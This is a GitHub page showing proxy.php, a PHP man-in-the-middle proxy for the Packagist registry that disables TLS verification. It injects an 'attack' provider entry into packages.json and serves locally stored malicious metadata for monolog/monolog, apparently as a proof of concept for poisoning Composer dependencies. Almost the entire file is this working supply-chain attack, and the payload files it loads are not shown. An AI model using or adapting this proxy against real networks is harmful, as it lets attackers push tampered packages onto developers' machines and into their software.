-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathproxy.php
More file actions
70 lines (45 loc) · 1.63 KB
/
proxy.php
File metadata and controls
70 lines (45 loc) · 1.63 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
<?php
$url = $_GET['url'];
$method = $_SERVER['REQUEST_METHOD'];
$https = $_SERVER['HTTPS'];
$furl = ( $https == 'on' ) ? "https://" : "http://";
$furl .= "packagist.org$url";
debuglog( "Call ($method):$https to '$furl'" );
if ( $url == '/packages.json' ) {
$data = getPackagist( $furl, $https );
$attackfile = file_get_contents( './p-attack.json' );
$hash = hash( 'sha256', $attackfile );
$data = str_replace( '}}}', '},"p\/provider-attack$%hash%.json":{"sha256":"'.$hash.'"}}}', $data );
debuglog( "New packages.json: $data" );
} elseif ( preg_match( '#^/p/provider-attack#', $url ) ) {
$data = file_get_contents( './p-attack.json' );
debuglog( "Sending attack provider: $data" );
} elseif ( preg_match( '#^/p/monolog/monolog#', $url ) ) {
$data = file_get_contents( './monolog.json' );
debuglog( "Sending attack monolog: $data" );
} else {
$data = getPackagist( $furl, $https );
}
echo $data;
function getPackagist( $furl, $https ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $furl );
curl_setopt( $ch, CURLOPT_HEADER, 0 );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
if ( $https == 'on' ) {
curl_setopt( $ch, CURLOPT_PORT , 443 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, 0 );
}
$data = curl_exec( $ch );
$info = curl_getinfo( $ch );
if ( curl_errno( $ch ) ) {
debuglog( "Curl error: ".curl_error($ch) );
}
$hash = hash( 'sha256', $data );
debuglog( "Response from {$info['url']} ({$info['http_code']}): {$info['content_type']}, $hash" );
return $data;
}
function debuglog( $msg ) {
file_put_contents( '/tmp/proxy.log', "$msg\n", FILE_APPEND );
}